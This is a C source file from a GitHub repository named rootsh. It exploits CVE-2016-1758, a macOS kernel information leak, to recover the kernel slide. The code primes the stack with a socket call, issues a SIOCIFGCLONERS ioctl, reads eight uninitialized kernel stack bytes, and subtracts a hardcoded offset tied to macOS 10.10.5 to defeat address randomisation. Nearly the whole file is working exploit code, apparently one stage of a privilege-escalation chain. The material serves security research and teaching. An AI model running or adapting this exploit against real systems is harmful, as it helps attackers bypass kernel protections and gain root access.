rootsh/kernel_slide.c at master · bazad/rootsh · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
/* kernel_slide.c
 * Brandon Azad
 *
 * Kernel information leak to recover the kernel slide.
 *
 * CVE-2016-1758:
 *   This is a kernel information leak in the function if_clone_list caused by
 *   copying out 8 uninitialized bytes of the kernel stack to user space.
 */

#include "kernel_slide.h"

#include <net/if.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>

uint64_t kernel_slide;

static int
is_kernel_pointer(uint64_t addr) {
	return (0xffffff7f00000000 <= addr && addr < 0xffffff8100000000);
}

static int
is_kernel_slide(uint64_t slide) {
	return ((slide & ~0x000000007fe00000) == 0);
}

/* Recover the kernel slide. The kernel slide is used to translate the
   compile-time addresses in the kernel binary to runtime addresses in the live
   kernel. */
int
find_kernel_slide() {
	int sockfd = socket(AF_INET, SOCK_STREAM, 0);   /* prime stack */
	if (sockfd == -1) {
		printf("error: socket failed\n");
		return 1;
	}
	char buffer[IFNAMSIZ];
	struct if_clonereq ifcr = {
		.ifcr_count  = 1,
		.ifcr_buffer = buffer,
	};
	int err = ioctl(sockfd, SIOCIFGCLONERS, &ifcr);
	if (err == -1) {
		printf("error: ioctl failed\n");
		return 2;
	}
	close(sockfd);
	uint64_t value = *(uint64_t *)(buffer + 8);
	if (!is_kernel_pointer(value)) {
		printf("error: leaked 0x%016llx\n", value);
		return 3;
	}
	kernel_slide = value - 0xffffff800033487f;      /* 10.10.5 (14F27): __kernel__: _ledger_credit+95 */
	if (is_kernel_slide(kernel_slide)) {
		return 0;
	}
	printf("error: leaked 0x%016llx\n", value);
	return 4;
}